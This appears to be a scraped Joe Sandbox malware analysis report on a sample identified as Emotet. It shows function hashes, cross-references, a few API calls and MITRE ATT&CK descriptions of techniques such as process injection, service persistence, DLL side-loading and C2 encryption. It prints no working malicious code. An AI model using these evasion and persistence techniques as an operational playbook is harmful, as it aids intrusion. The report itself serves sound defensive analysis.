#X, xrefs: 000B76FC
zd, xrefs: 000B769C
\L, xrefs: 000B7657
WDuA, xrefs: 000B7876
WDuA, xrefs: 000B78DA
WDuA, xrefs: 000B79BA

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID:
String ID: #X$WDuA$WDuA$WDuA$\L$zd
API String ID: 0-1901454614
Opcode ID: 8730e17ca4862135a39e50a2fa7619528730893be443fbbfdfc427fd35cff798
Instruction ID: b1d62f5700ca06fb0d4dc144f270e72507021e8a0d84844968c5388820030df4
Opcode Fuzzy Hash: 8730e17ca4862135a39e50a2fa7619528730893be443fbbfdfc427fd35cff798
Instruction Fuzzy Hash: 0491BF716083019BD798EF68D8995AFBBE1EBC4344F104A2DF49AD7250DB78CD048B92

Function 000B87E0 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

WDuA, xrefs: 000B897C
WDuA, xrefs: 000B886C
WDuA, xrefs: 000B883E
WDuA, xrefs: 000B89DF

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID:
String ID: WDuA$WDuA$WDuA$WDuA
API String ID: 0-950830227
Opcode ID: 423999ac780cacb330ea7e54e91307e2f8210f746f5ebaf07120a22e370deb89
Instruction ID: 03d7bb4fcaea670d7d86db368daacb758daf830e5634d0e691008cbc38a30a7b
Opcode Fuzzy Hash: 423999ac780cacb330ea7e54e91307e2f8210f746f5ebaf07120a22e370deb89
Instruction Fuzzy Hash: F94126707042019BEF64ABA4D8917FE36C9E780314F68892AE946DB3A2EE34DD41C742

Function 000B3D10 Relevance: 3.9, Strings: 3, Instructions: 102COMMON

Download Yara Rule

Strings

C, xrefs: 000B3D80
W, xrefs: 000B3E41
E1, xrefs: 000B3D50

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID:
String ID: C$E1$W
API String ID: 0-3013057810
Opcode ID: 382f4db0c6fffee24243230d49672a6b5c0222ae8939b7145abeba23048bc470
Instruction ID: cdc0775c2c586aee5ac21bf7ba167d3f714a2e7adb4e2a93278c09c850b3a74c
Opcode Fuzzy Hash: 382f4db0c6fffee24243230d49672a6b5c0222ae8939b7145abeba23048bc470
Instruction Fuzzy Hash: 664102B29083928BD758CF24D58546BBBE1FB90750F540E1EF4A15A250D3B4DA4DCBA3

Function 000B3D37 Relevance: 3.8, Strings: 3, Instructions: 83COMMON

Download Yara Rule

Strings

C, xrefs: 000B3D80
W, xrefs: 000B3E41
E1, xrefs: 000B3D50

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID:
String ID: C$E1$W
API String ID: 0-3013057810
Opcode ID: 7e7e774d2ddf906cf13ff0a1a6950789cd7c477ed5a5ce8b314ad04d32ac2694
Instruction ID: c0db41edc4ed20ccd63947d4ec2d5de42c3d90bb61a567906b6a603038889d50
Opcode Fuzzy Hash: 7e7e774d2ddf906cf13ff0a1a6950789cd7c477ed5a5ce8b314ad04d32ac2694
Instruction Fuzzy Hash: 8241E2B29083938BD768CF24D54916BB7E1BBD0714F004E1EF4A15A290D3B4DA4DCBA3

Function 000B3B10 Relevance: 3.8, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

E1, xrefs: 000B3B20
W, xrefs: 000B3BA0
W, xrefs: 000B3C1B

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID:
String ID: E1$W$W
API String ID: 0-1447379309
Opcode ID: dcf952a1631fef7cd806af8a182772388f3a47c0f30ba73ecaa6f79687da2c60
Instruction ID: bb06c6ed1acd464d4d6c32700baa84095f9621d9ed741cc4f54c628b80ef15b3
Opcode Fuzzy Hash: dcf952a1631fef7cd806af8a182772388f3a47c0f30ba73ecaa6f79687da2c60
Instruction Fuzzy Hash: 2C31F572808352AFD3588F25C49805BFBF1BBD0764F51C91EF4A956260D3B8D949CF82

Function 000B39B0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON

Download Yara Rule

Strings

E1, xrefs: 000B39C0
W, xrefs: 000B3ABE
W, xrefs: 000B3A40

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID:
String ID: E1$W$W
API String ID: 0-1447379309
Opcode ID: ee9d7b43610636101bf78b2e9dec18c5e67d0b706d14bbc9c721bc8caccc639c
Instruction ID: 42e560f059ddccd27c54882d20db8731ad1e76d22a1aba311489f69263455024
Opcode Fuzzy Hash: ee9d7b43610636101bf78b2e9dec18c5e67d0b706d14bbc9c721bc8caccc639c
Instruction Fuzzy Hash: 5331E371808392AFD759CF25C48815BFBE1ABC47A4F14C91EF8E95A260C3B89949CF53

Function 000B1BE0 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77a4dba2a41e213b57da11383a69cde235e82c58b1ee08f51db821376044cc00
Instruction ID: 59d8915c8b39eec69512a99e106bb3f7c3b30a0e539da2fb407def733d0c932f
Opcode Fuzzy Hash: 77a4dba2a41e213b57da11383a69cde235e82c58b1ee08f51db821376044cc00
Instruction Fuzzy Hash: B9415D716087419BD348DF69D8951ABB7E1EBC4714F10C92DE8A697361EBB8CD088F82

Function 000B4C10 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Function 000B9440 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 156COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000B94FB
GetCurrentProcessId.KERNEL32(00000000), ref: 000B94FE
_snwprintf.NTDLL ref: 000B9518

Strings

)3', xrefs: 000B9450
)3', xrefs: 000B956F

Memory Dump Source

Source File: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000000.00000002.2041722614.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041891611.00000000000BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2041908928.00000000000BF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b0000_75A0VTo3z9.jbxd

Yara matches

Similarity

API ID: CountCurrentProcessTick_snwprintf
String ID: )3'$)3'
API String ID: 408895649-986283065
Opcode ID: 3ced9650d01397d3012b646e898c8b8f03f327870bc82b55d69c7247560587af
Instruction ID: 294d9abf8ea1a909117623aa828518382cbd568da06a799fd2d99d592e17c74c
Opcode Fuzzy Hash: 3ced9650d01397d3012b646e898c8b8f03f327870bc82b55d69c7247560587af
Instruction Fuzzy Hash: 6F41A3707006504BEB64BBF9ECA1BEB27D5DB90354B244A29FA09DB352EE3CCD414B91

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 75A0VTo3z9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Emotet

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

Windows Analysis Report
75A0VTo3z9.exe

Function 000B7E50 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237
fileCOMMON

Function 000B8210 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 193
fileCOMMON

Function 000B36A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 212
fileCOMMON

Function 000B6F10 Relevance: 1.6, APIs: 1, Instructions: 109
libraryCOMMON

Function 000B9680 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 200
memoryCOMMON

Function 000B2EA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142
memoryCOMMON

Function 000B4990 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87
processCOMMON

Function 000B40D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Function 000B5AD0 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 000B3460 Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Function 000B6E70 Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Function 000B4E60 Relevance: 10.2, Strings: 8, Instructions: 226
COMMON